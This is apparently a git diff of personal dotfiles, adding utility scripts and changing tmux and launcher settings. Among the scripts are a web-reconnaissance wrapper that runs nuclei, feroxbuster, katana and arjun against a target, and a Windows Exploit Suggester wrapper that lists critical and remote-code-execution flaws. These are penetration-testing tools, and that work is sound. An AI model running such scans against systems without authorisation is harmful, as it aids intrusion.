# Try multiple methods (in order of preference)
|
||||
generate_uuid() {
|
||||
# Method 1: Python (most portable)
|
||||
if command -v python3 &>/dev/null; then
|
||||
python3 -c 'import uuid; print(uuid.uuid4())'
|
||||
# Method 2: Ruby
|
||||
elif command -v ruby &>/dev/null; then
|
||||
ruby -e "require 'securerandom'; puts SecureRandom.uuid"
|
||||
# Method 3: uuidgen (available on many systems)
|
||||
elif command -v uuidgen &>/dev/null; then
|
||||
uuidgen | tr '[:upper:]' '[:lower:]'
|
||||
# Method 4: /proc/sys/kernel/random/uuid (Linux)
|
||||
elif [[ -r /proc/sys/kernel/random/uuid ]]; then
|
||||
cat /proc/sys/kernel/random/uuid
|
||||
else
|
||||
echo "Error: No UUID generation method available" >&2
|
||||
echo "Install python3, ruby, or uuid-runtime package" >&2
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
for ((i=1; i<=count; i++)); do
|
||||
generate_uuid
|
||||
done
|
||||
46
scripts/waitfor
Executable file
46
scripts/waitfor
Executable file
|
|
@ -0,0 +1,46 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: waitfor
|
||||
# Description: Wait for process to complete (useful for automation chains)
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||
# Usage: long-running-cmd & waitfor $! # wait for background job
|
||||
# waitfor 1234 # wait for specific PID
|
||||
# waitfor 1234 && notify "Job done!" # chain operations
|
||||
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: waitfor <PID>" >&2
|
||||
echo "Example: firefox & waitfor \$!" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
pid=$1
|
||||
|
||||
if ! ps -p "$pid" > /dev/null 2>&1; then
|
||||
echo "Process $pid not found or already completed" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
process_name=$(ps -p "$pid" -o comm= 2>/dev/null || echo "unknown")
|
||||
echo "Waiting for $process_name (PID: $pid) to complete..."
|
||||
|
||||
# Strategy 1: systemd-inhibit (Linux - prevents sleep)
|
||||
if command -v systemd-inhibit &>/dev/null; then
|
||||
systemd-inhibit --what=sleep --who="waitfor" \
|
||||
--why="Waiting for PID $pid ($process_name)" \
|
||||
tail --pid="$pid" -f /dev/null 2>/dev/null
|
||||
# Strategy 2: caffeinate (macOS - prevents sleep)
|
||||
elif command -v caffeinate &>/dev/null; then
|
||||
caffeinate -w "$pid"
|
||||
# Strategy 3: Simple polling (fallback)
|
||||
else
|
||||
tail --pid="$pid" -f /dev/null 2>/dev/null || {
|
||||
# If tail doesn't support --pid, use manual polling
|
||||
while ps -p "$pid" > /dev/null 2>&1; do
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
fi
|
||||
|
||||
echo "✓ Process $pid completed"
|
||||
265
scripts/web-recon.sh.backup-20251030-032335
Executable file
265
scripts/web-recon.sh.backup-20251030-032335
Executable file
|
|
@ -0,0 +1,265 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: web-recon.sh
|
||||
# Description: Web application reconnaissance with tmux orchestration
|
||||
# Usage: web-recon <url>
|
||||
# Creates tmux window with parallel web scans (nuclei, feroxbuster, katana, arjun)
|
||||
|
||||
VERSION="2.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Status indicators
|
||||
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||
readonly REDMINUS="${RED}[-]${NC}"
|
||||
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}web-recon${NC} - Web Application Reconnaissance v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " web-recon <url>"
|
||||
echo
|
||||
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||
echo " Creates tmux window with 4 panes running parallel/pipelined web reconnaissance:"
|
||||
echo " - Pane 1 (top-left): nuclei (vulnerability scanner)"
|
||||
echo " - Pane 2 (top-right): feroxbuster → arjun (pipeline)"
|
||||
echo " - Pane 3 (bottom-left): katana (web crawler with JS parsing)"
|
||||
echo " - Pane 4 (bottom-right): live results dashboard"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " web-recon http://target.htb"
|
||||
echo " web-recon https://example.com"
|
||||
echo " web-recon 10.10.10.5"
|
||||
echo
|
||||
echo -e "${BOLD}OUTPUT:${NC}"
|
||||
echo " All results saved to: ./web-recon-<target>-<timestamp>/"
|
||||
echo
|
||||
echo -e "${BOLD}WORKFLOW:${NC}"
|
||||
echo " - Nuclei & Katana: Run in parallel immediately"
|
||||
echo " - Feroxbuster (5 min) → Arjun: Pipeline (arjun waits for feroxbuster)"
|
||||
echo " - httpx: Live monitoring - probes URLs as they're discovered"
|
||||
}
|
||||
|
||||
# Check required tools
|
||||
check_tools() {
|
||||
local missing=()
|
||||
local optional_missing=()
|
||||
|
||||
# Core tools
|
||||
command -v tmux &>/dev/null || missing+=("tmux")
|
||||
|
||||
# Web tools (all optional but warn)
|
||||
command -v nuclei &>/dev/null || optional_missing+=("nuclei")
|
||||
command -v feroxbuster &>/dev/null || optional_missing+=("feroxbuster")
|
||||
command -v katana &>/dev/null || optional_missing+=("katana")
|
||||
command -v arjun &>/dev/null || optional_missing+=("arjun")
|
||||
|
||||
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
|
||||
echo -e "${CYAN}Install with:${NC}"
|
||||
for tool in "${optional_missing[@]}"; do
|
||||
case "$tool" in
|
||||
nuclei) echo " go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
|
||||
feroxbuster) echo " cargo install feroxbuster (or: sudo apt install feroxbuster)" ;;
|
||||
katana) echo " go install github.com/projectdiscovery/katana/cmd/katana@latest" ;;
|
||||
arjun) echo " pipx install arjun" ;;
|
||||
esac
|
||||
done
|
||||
echo
|
||||
fi
|
||||
}
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir() {
|
||||
local url="$1"
|
||||
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||
|
||||
OUTPUT_DIR="web-recon-${clean_url}-${timestamp}"
|
||||
mkdir -p "$OUTPUT_DIR"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Main web-recon function
|
||||
run_web_recon() {
|
||||
local url="$1"
|
||||
|
||||
# Ensure URL has http:// or https://
|
||||
if [[ ! "$url" =~ ^https?:// ]]; then
|
||||
url="http://$url"
|
||||
echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}${BOLD}"
|
||||
echo "╔════════════════════════════════════════════════════════════╗"
|
||||
echo "║ Web Application Reconnaissance ║"
|
||||
echo "║ Target: $url"
|
||||
echo "╚════════════════════════════════════════════════════════════╝"
|
||||
echo -e "${NC}"
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir "$url"
|
||||
|
||||
# Check if in tmux
|
||||
if [[ -z "${TMUX:-}" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||
run_scans_sequential "$url"
|
||||
return
|
||||
fi
|
||||
|
||||
# Create tmux window
|
||||
WINDOW_NAME="--> Web: ${url:0:20}... <--"
|
||||
tmux new-window -n "$WINDOW_NAME"
|
||||
|
||||
# Split into 4 panes with explicit targeting
|
||||
# Layout: 2x2 grid with pipelines and live monitoring
|
||||
# ACTUAL pane numbers after splits: 1, 2, 3, 4 (no pane 0!)
|
||||
# [1: nuclei] [2: feroxbuster → arjun]
|
||||
# [3: katana] [4: live dashboard]
|
||||
|
||||
# Create 2x2 grid layout
|
||||
# CRITICAL: Tmux pane numbering behavior discovered through testing:
|
||||
# Step 1: split-window -h creates [0:left] [1:right]
|
||||
# Step 2: select pane 0, split-window -v creates [0:TL] [1:BL] [2:right]
|
||||
# Step 3: select pane 2, split-window -v creates [1:TL] [2:TR] [3:BL] [4:BR]
|
||||
#
|
||||
# PANE 0 DISAPPEARS during this process! Final panes are numbered 1, 2, 3, 4
|
||||
|
||||
# Split horizontally first (left | right)
|
||||
tmux split-window -h
|
||||
|
||||
# Split left column vertically
|
||||
tmux select-pane -t 0
|
||||
tmux split-window -v
|
||||
|
||||
# Split right column vertically (target pane 2 after left split)
|
||||
tmux select-pane -t 2
|
||||
tmux split-window -v
|
||||
|
||||
# Force tiled layout for perfect 2x2 grid (equal-sized panes)
|
||||
tmux select-layout tiled
|
||||
|
||||
# Final verified pane layout after tmux renumbering and tiled layout:
|
||||
# 1 (top-left) 2 (top-right)
|
||||
# 3 (bottom-left) 4 (bottom-right)
|
||||
|
||||
# Send commands to each pane with ACTUAL pane numbers after splits
|
||||
# After all splits complete, tmux renumbers panes as: 1 (TL), 2 (TR), 3 (BL), 4 (BR)
|
||||
# (pane 0 disappears during the splitting process)
|
||||
|
||||
# Pane 1 (top-left): nuclei
|
||||
tmux select-pane -t 1
|
||||
if command -v nuclei &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting nuclei vulnerability scan...${NC}' && nuclei -u '$url' -o nuclei.txt && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 2 (top-right): feroxbuster THEN arjun (pipeline)
|
||||
tmux select-pane -t 2
|
||||
if command -v feroxbuster &>/dev/null; then
|
||||
# Run feroxbuster, then arjun on discovered URLs
|
||||
if command -v arjun &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting feroxbuster (5 min limit, default wordlist)...${NC}' && echo -e '${YELLOW}💡 Tip: Install SecLists for better wordlists: sudo apt install seclists${NC}' && timeout 300 feroxbuster -u '$url' -d 3 --force-recursion -C 404 -o feroxbuster.txt 2>&1 | tee feroxbuster-stderr.log || echo 'Feroxbuster exited' && echo -e '${GREEN}✓ Feroxbuster complete${NC}' && cat feroxbuster.txt 2>/dev/null | grep -oE 'http[s]?://[^[:space:]]+' >> urls.txt || true && echo -e '${GREENSTAR} Starting arjun parameter discovery...${NC}' && arjun -u '$url' -oT arjun_main.txt 2>&1 | tee arjun.log && if [ -f urls.txt ] && [ -s urls.txt ]; then echo -e '${GREENSTAR} Running arjun on discovered URLs...${NC}' && arjun -i urls.txt -oT arjun_urls.txt 2>&1 | tee -a arjun.log || true; fi && echo -e '${GREEN}✓ Arjun complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting feroxbuster (5 min limit, default wordlist)...${NC}' && echo -e '${YELLOW}💡 Tip: Install SecLists for better wordlists: sudo apt install seclists${NC}' && timeout 300 feroxbuster -u '$url' -d 3 --force-recursion -C 404 -o feroxbuster.txt 2>&1 | tee feroxbuster-stderr.log || echo 'Feroxbuster exited' && echo -e '${GREEN}✓ Feroxbuster complete${NC}' && cat feroxbuster.txt 2>/dev/null | grep -oE 'http[s]?://[^[:space:]]+' >> urls.txt || true" C-m
|
||||
fi
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ feroxbuster not installed - skipping${NC}' && touch urls.txt" C-m
|
||||
fi
|
||||
|
||||
# Pane 3 (bottom-left): katana (web crawler with all output formats)
|
||||
tmux select-pane -t 3
|
||||
if command -v katana &>/dev/null; then
|
||||
# Full katana with all output formats as originally requested
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting katana crawler (full output)...${NC}' && katana -u '$url' -jc -kf all -aff -d 10 -o katana.txt 2>&1 | tee katana.log && katana -u '$url' -jc -kf all -aff -d 10 -f path -o katana_paths.txt && katana -u '$url' -jc -kf all -aff -d 10 -f url -o katana_urls.txt && katana -u '$url' -jc -kf all -aff -d 10 -f udir -o katana_dirs.txt && cat katana_dirs.txt 2>/dev/null | sort -u >> urls.txt && cat katana_paths.txt 2>/dev/null | sed 's/^.//g' >> paths.txt && echo -e '${GREEN}✓ Katana complete (all formats)${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ katana not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 4 (bottom-right): Live results dashboard
|
||||
tmux select-pane -t 4
|
||||
# Watch output files and show live statistics
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ LIVE SCAN RESULTS DASHBOARD ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Scan Progress ═══${NC}'; echo; echo -e '${GREEN}Nuclei:${NC}'; [ -f nuclei.txt ] && echo \" Found: \$(wc -l < nuclei.txt 2>/dev/null || echo 0) findings\" || echo ' Waiting...'; echo; echo -e '${GREEN}Feroxbuster:${NC}'; [ -f feroxbuster.txt ] && echo \" Found: \$(grep -c '200\\|301\\|302\\|403' feroxbuster.txt 2>/dev/null || echo 0) endpoints\" || echo ' Waiting...'; echo; echo -e '${GREEN}Katana:${NC}'; [ -f katana.txt ] && echo \" Crawled: \$(wc -l < katana.txt 2>/dev/null || echo 0) URLs\" || echo ' Waiting...'; echo; echo -e '${GREEN}URLs Discovered:${NC}'; [ -f urls.txt ] && echo \" Total: \$(sort -u urls.txt 2>/dev/null | wc -l) unique URLs\" && echo && echo -e '${CYAN}Latest URLs:${NC}' && tail -5 urls.txt 2>/dev/null || echo ' None yet'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 3; done" C-m
|
||||
|
||||
# Focus back on top-left pane (nuclei)
|
||||
tmux select-pane -t 1
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Tmux web-recon window created"
|
||||
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Web: ${url:0:20}... <--${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
echo
|
||||
echo -e "${YELLOW}Note:${NC} Feroxbuster will auto-stop after 5 minutes"
|
||||
echo -e "${YELLOW}Note:${NC} Arjun waits 10 seconds before starting"
|
||||
}
|
||||
|
||||
# Sequential execution (when not in tmux)
|
||||
run_scans_sequential() {
|
||||
local url="$1"
|
||||
|
||||
cd "$OUTPUT_DIR"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running nuclei...${NC}"
|
||||
command -v nuclei &>/dev/null && nuclei -u "$url" -o nuclei.txt || echo "nuclei not installed"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running feroxbuster (5 min timeout)...${NC}"
|
||||
if command -v feroxbuster &>/dev/null; then
|
||||
timeout 300 feroxbuster -u "$url" -d 3 --smart --silent --force-recursion -o feroxbuster.txt 2>/dev/null || true
|
||||
cat feroxbuster.txt 2>/dev/null | awk '{print $1}' >> urls.txt
|
||||
fi
|
||||
|
||||
echo -e "\n${GREENSTAR} Running katana...${NC}"
|
||||
if command -v katana &>/dev/null; then
|
||||
katana -u "$url" -jc -kf all -aff -d 10 -o katana.txt
|
||||
cat katana.txt 2>/dev/null | sort -u >> urls.txt
|
||||
fi
|
||||
|
||||
echo -e "\n${GREENSTAR} Running arjun...${NC}"
|
||||
if command -v arjun &>/dev/null; then
|
||||
arjun -u "$url" -oT arjun_main.txt 2>&1 | tee arjun.log
|
||||
[ -f urls.txt ] && [ -s urls.txt ] && arjun -i urls.txt -oT arjun_urls.txt 2>&1 | tee -a arjun.log || true
|
||||
fi
|
||||
|
||||
cd ..
|
||||
|
||||
echo -e "\n${GREEN}✓${NC} Web recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
url="$1"
|
||||
|
||||
# Validate URL
|
||||
if [[ -z "$url" ]]; then
|
||||
echo -e "${RED}Error:${NC} URL required"
|
||||
echo "Usage: web-recon <url>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check tools
|
||||
check_tools
|
||||
|
||||
# Run web reconnaissance
|
||||
run_web_recon "$url"
|
||||
57
scripts/wes
Executable file
57
scripts/wes
Executable file
|
|
@ -0,0 +1,57 @@
|
|||
#!/usr/bin/env bash
|
||||
# Windows Exploit Suggester (WES-NG) wrapper
|
||||
# Analyzes systeminfo.txt and generates vulnerability reports
|
||||
# Requires: systeminfo.txt in current directory, WES-NG cloned to ~/scripts/wesng
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
# Colors for output
|
||||
RED='\033[0;31m'
|
||||
YELLOW='\033[0;33m'
|
||||
GREEN='\033[0;32m'
|
||||
NC='\033[0m' # No Color
|
||||
|
||||
cwd=$(basename "$PWD")
|
||||
|
||||
# Check for systeminfo.txt
|
||||
if [ ! -f systeminfo.txt ]; then
|
||||
echo -e "${RED}Error:${NC} No 'systeminfo.txt' file found in '$PWD'"
|
||||
echo "Usage: Run 'systeminfo > systeminfo.txt' on target Windows machine"
|
||||
echo " Then copy systeminfo.txt to your analysis directory"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check for WES-NG installation
|
||||
if [ ! -d "$HOME/scripts/wesng" ]; then
|
||||
echo -e "${YELLOW}⚠${NC} WES-NG not found at ~/scripts/wesng"
|
||||
echo "Clone it: git clone https://github.com/bitsadmin/wesng ~/scripts/wesng"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Navigate to WES-NG directory
|
||||
cd "$HOME/scripts/wesng"
|
||||
|
||||
echo "Analyzing systeminfo.txt..."
|
||||
|
||||
# Generate reports
|
||||
echo " → All vulnerabilities..."
|
||||
"$HOME/scripts/wesng/wes.py" "$OLDPWD/systeminfo.txt" -c -o "wes-${cwd}-vulns.txt"
|
||||
|
||||
echo " → Critical vulnerabilities only..."
|
||||
"$HOME/scripts/wesng/wes.py" "$OLDPWD/systeminfo.txt" -c -s critical > "wes-${cwd}-critical.txt"
|
||||
|
||||
echo " → Remote Code Execution (RCE) vulnerabilities..."
|
||||
"$HOME/scripts/wesng/wes.py" "$OLDPWD/systeminfo.txt" -c -i "Remote Code Execution" > "wes-${cwd}-rce.txt"
|
||||
|
||||
# Move reports back to analysis directory
|
||||
mv "wes-${cwd}-vulns.txt" "wes-${cwd}-critical.txt" "wes-${cwd}-rce.txt" "$OLDPWD"
|
||||
|
||||
# Return to original directory
|
||||
cd "$OLDPWD"
|
||||
|
||||
echo -e "${GREEN}✓${NC} WES analysis complete"
|
||||
echo ""
|
||||
echo "Reports generated:"
|
||||
echo " - wes-${cwd}-vulns.txt (all vulnerabilities)"
|
||||
echo " - wes-${cwd}-critical.txt (critical only)"
|
||||
echo " - wes-${cwd}-rce.txt (RCE only)"
|
||||
43
scripts/yt-audio
Executable file
43
scripts/yt-audio
Executable file
|
|
@ -0,0 +1,43 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: yt-audio
|
||||
# Description: Download audio-only from YouTube/media sites
|
||||
# Author: Custom (inspired by Evan Hahn's getsong)
|
||||
# Usage: yt-audio <url>
|
||||
# yt-audio <url> --format m4a
|
||||
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: yt-audio <url> [--format mp3|m4a|opus]" >&2
|
||||
echo "Example: yt-audio 'https://youtube.com/watch?v=xxxxx'" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if ! command -v yt-dlp &>/dev/null; then
|
||||
echo "Error: yt-dlp not found. Install with: sudo apt install yt-dlp" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
url="$1"
|
||||
format="${2:-mp3}" # Default to mp3
|
||||
|
||||
# Remove -- prefix if present
|
||||
format="${format#--format }"
|
||||
format="${format#--}"
|
||||
|
||||
echo "🎵 Downloading audio from: $url"
|
||||
echo "📁 Format: $format"
|
||||
echo ""
|
||||
|
||||
# Download audio-only in best quality
|
||||
yt-dlp \
|
||||
--extract-audio \
|
||||
--audio-format "$format" \
|
||||
--audio-quality 0 \
|
||||
--embed-thumbnail \
|
||||
--embed-metadata \
|
||||
--output "%(title)s.%(ext)s" \
|
||||
"$url"
|
||||
|
||||
echo ""
|
||||
echo "✅ Download complete!"
|
||||
|
|
@ -605,6 +605,9 @@ set -g @plugin 'tmux-plugins/tmux-resurrect'
|
|||
set -g @plugin 'tmux-plugins/tmux-continuum'
|
||||
set -g @continuum-restore 'on'
|
||||
|
||||
# Configure which programs resurrect should restore
|
||||
set -g @resurrect-processes 'vi vim nvim emacs man less more tail top htop irssi weechat mutt btop "~claude->claude" "~hx->hx" "~helix->helix"'
|
||||
|
||||
# unbind-key -T prefix 'u'
|
||||
bind-key -T prefix U run-shell /home/e/.tmux/plugins/tpm/bindings/update_plugins
|
||||
|
||||
|
|
|
|||
Binary file not shown.
|
|
@ -13,13 +13,6 @@
|
|||
"last_commit": "7dedd992709fa2297735cddf852404144d4da47c",
|
||||
"last_commit_time": "2023-11-14T16:53:20"
|
||||
},
|
||||
"com.github.brpaz.ulauncher-file-search": {
|
||||
"id": "com.github.brpaz.ulauncher-file-search",
|
||||
"url": "https://github.com/brpaz/ulauncher-file-search",
|
||||
"updated_at": "2025-03-16T13:02:34.961317",
|
||||
"last_commit": "0ea61c2049b27f1ddfa81d1844876f21dd9d6e7b",
|
||||
"last_commit_time": "2020-07-03T13:30:16"
|
||||
},
|
||||
"com.github.mikebarkmin.ulauncher-obsidian": {
|
||||
"id": "com.github.mikebarkmin.ulauncher-obsidian",
|
||||
"url": "https://github.com/mikebarkmin/ulauncher-obsidian",
|
||||
|
|
@ -149,7 +142,7 @@
|
|||
"com.github.tuanpham-dev.ulauncher-better-calculator": {
|
||||
"id": "com.github.tuanpham-dev.ulauncher-better-calculator",
|
||||
"url": "https://github.com/tuanpham-dev/ulauncher-better-calculator",
|
||||
"updated_at": "2025-05-04T00:22:46.353818",
|
||||
"updated_at": "2025-10-17T00:21:49.364925",
|
||||
"last_commit": "48f0592a2a8ac9ec2589a06b562141e1a2d9b25f",
|
||||
"last_commit_time": "2023-04-24T13:55:30"
|
||||
},
|
||||
|
|
|
|||
|
|
@ -7,6 +7,6 @@
|
|||
"render-on-screen": "mouse-pointer-monitor",
|
||||
"show-indicator-icon": true,
|
||||
"show-recent-apps": "0",
|
||||
"terminal-command": "tabby",
|
||||
"terminal-command": "ghostty",
|
||||
"theme-name": "Catppuccin-Mocha-Lavender"
|
||||
}
|
||||
|
|
@ -1,24 +1,14 @@
|
|||
{
|
||||
"3b6e658e-48ed-424e-9a1d-0fff6b9b9856": {
|
||||
"id": "3b6e658e-48ed-424e-9a1d-0fff6b9b9856",
|
||||
"name": "Google Search",
|
||||
"keyword": "g",
|
||||
"cmd": "https://google.com/search?q=%s",
|
||||
"icon": "/usr/share/ulauncher/media/google-search-icon.png",
|
||||
"name": "SearXNG Search",
|
||||
"keyword": "s",
|
||||
"cmd": "http://localhost:8080/search?q=%s",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/edit-find.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1742151029.2172832
|
||||
},
|
||||
"6ef166ce-911c-447e-9025-8316e681c1e6": {
|
||||
"id": "6ef166ce-911c-447e-9025-8316e681c1e6",
|
||||
"name": "Stack Overflow",
|
||||
"keyword": "so",
|
||||
"cmd": "https://stackoverflow.com/search?q=%s",
|
||||
"icon": "/usr/share/ulauncher/media/stackoverflow-icon.svg",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1742151029.2172987
|
||||
},
|
||||
"8f7c013e-9ad4-412a-b43a-879ec9c4e6f1": {
|
||||
"id": "8f7c013e-9ad4-412a-b43a-879ec9c4e6f1",
|
||||
"name": "Perplexity",
|
||||
|
|
@ -29,51 +19,11 @@
|
|||
"run_without_argument": false,
|
||||
"added": 1742151030.0001
|
||||
},
|
||||
"a2dcd73c-0d5f-40cb-bf91-bcde88d26f01": {
|
||||
"id": "a2dcd73c-0d5f-40cb-bf91-bcde88d26f01",
|
||||
"name": "YouTube Search",
|
||||
"keyword": "ytube",
|
||||
"cmd": "https://www.youtube.com/results?search_query=%s",
|
||||
"icon": "/usr/share/icons/hicolor/256x256/apps/youtube.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1742151030.0002
|
||||
},
|
||||
"9cd54c70-3402-4961-b957-cac85f5478cf": {
|
||||
"id": "9cd54c70-3402-4961-b957-cac85f5478cf",
|
||||
"name": "GitHub Search",
|
||||
"keyword": "gh",
|
||||
"cmd": "https://github.com/search?q=%s",
|
||||
"icon": "/usr/share/icons/hicolor/256x256/apps/github.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1742151030.0003
|
||||
},
|
||||
"3de10f2b-ecb4-4b36-ae89-9dabc070c221": {
|
||||
"id": "3de10f2b-ecb4-4b36-ae89-9dabc070c221",
|
||||
"name": "Amazon Search",
|
||||
"keyword": "a",
|
||||
"cmd": "https://www.amazon.com/s?k=%s",
|
||||
"icon": "/usr/share/icons/hicolor/256x256/apps/amazon.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1742151030.0004
|
||||
},
|
||||
"6a5c6c4d-0aa7-4bc8-9e09-177987b3b0a1": {
|
||||
"id": "6a5c6c4d-0aa7-4bc8-9e09-177987b3b0a1",
|
||||
"name": "Python Scripts FZF",
|
||||
"keyword": "py",
|
||||
"cmd": "/path/to/run_py.sh",
|
||||
"icon": "/usr/share/icons/hicolor/256x256/apps/python.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1742151030.0005
|
||||
},
|
||||
"d3198654-0c45-47cf-a65a-2b79dff291e3": {
|
||||
"id": "d3198654-0c45-47cf-a65a-2b79dff291e3",
|
||||
"name": "Taskwarrior",
|
||||
"name": "Telos-Week",
|
||||
"keyword": "tw",
|
||||
"cmd": "gnome-terminal -- bash -c 'task; exec bash'",
|
||||
"cmd": "ghostty -e '/home/e/github/numerology/telos-week.ts --profile rob && read \"Press Enter to exit...\"'",
|
||||
"icon": "/usr/share/icons/hicolor/256x256/apps/org.gnome.Terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
|
|
@ -83,10 +33,310 @@
|
|||
"id": "a105b69e-d65f-45d8-a00c-57e0c24b5565",
|
||||
"name": "cht.sh Search",
|
||||
"keyword": "cht",
|
||||
"cmd": "https://cht.sh/%s",
|
||||
"cmd": "ghostty -e bash -c 'query=\"%s\"; query=\"${query// /+}\"; curl -s \"cht.sh/$query\" | less -R'",
|
||||
"icon": "/usr/share/icons/hicolor/256x256/apps/terminal.png",
|
||||
"is_default_search": true,
|
||||
"run_without_argument": false,
|
||||
"added": 1742151030.0007
|
||||
},
|
||||
"ghostty-quicklink": {
|
||||
"id": "ghostty-quicklink",
|
||||
"name": "Ghostty Terminal",
|
||||
"keyword": "g",
|
||||
"cmd": "ghostty",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729026000.0001
|
||||
},
|
||||
"zen-browser-quicklink": {
|
||||
"id": "zen-browser-quicklink",
|
||||
"name": "Zen Browser",
|
||||
"keyword": "z",
|
||||
"cmd": "zen-browser",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/web-browser.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729026000.0002
|
||||
},
|
||||
"n8n-quicklink": {
|
||||
"id": "n8n-quicklink",
|
||||
"name": "n8n Workflows",
|
||||
"keyword": "n8n",
|
||||
"cmd": "xdg-open https://n8n.djeditech.com",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/web-browser.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729026000.0004
|
||||
},
|
||||
"lazydocker-quicklink": {
|
||||
"id": "lazydocker-quicklink",
|
||||
"name": "LazyDocker",
|
||||
"keyword": "d",
|
||||
"cmd": "ghostty -e lazydocker",
|
||||
"icon": "/usr/share/icons/Adwaita/48x48/legacy/utilities-terminal.png",
|
||||
"is_default_search": false,
|
||||
"run_without_argument": true,
|
||||
"added": 1729026000.0005
|
||||
},
|
||||
